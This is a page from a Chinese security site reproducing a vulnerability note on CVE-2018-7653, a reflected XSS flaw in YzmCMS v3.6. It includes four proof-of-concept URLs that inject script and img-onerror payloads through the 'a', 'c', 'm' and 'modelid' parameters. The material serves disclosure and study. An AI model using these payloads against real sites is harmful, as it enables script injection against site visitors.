menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right (CVE-2018-7653)YzmCMS v3.6 xss漏洞 chevron_right (CVE-2018-7653)YzmCMS v3.6 xss漏洞.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2018-7653)YzmCMS v3.6 xss漏洞.md
    1.01 KB / 2021-07-15 20:12:17
        (CVE-2018-7653)YzmCMS v3.6 xss漏洞
====================================

一、漏洞简介
------------

YzmCMS是中国程序员袁志蒙开发的一套开源的CMS(内容管理系统)。 YzmCMS
3.6版本中存在跨站脚本漏洞。远程攻击者可借助'a'、'c'或'm'参数利用该漏洞注入任意的Web脚本或HTML。

二、漏洞影响
------------

YzmCMS v3.6

三、复现过程
------------

### poc

    http://www.0-sec.org/YzmCMS/index.php?m=search&c=index&a=initxqb4n%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecu9rs&modelid=1&q=tes 

    http://www.0-sec.org/YzmCMS/index.php?m=search&c=indexf9q6s%3cimg%20src%3da%20onerror%3dalert(1)%3ej4yck&a=init&modelid=1&q=tes 

    http://www.0-sec.org/YzmCMS/index.php?m=searchr81z4%3cimg%20src%3da%20onerror%3dalert(1)%3eo92wf&c=index&a=init&modelid=1&q=tes 

    http://www.0-sec.org/YzmCMS/index.php?m=search&c=index&a=init&modelid=1b2sgd%22%3e%3cscript%3ealert(1)%3c%2fscript%3eopzx0&q=tes

参考链接
--------

> <https://www.anquanke.com/vul/id/1124944>
    links
    file_download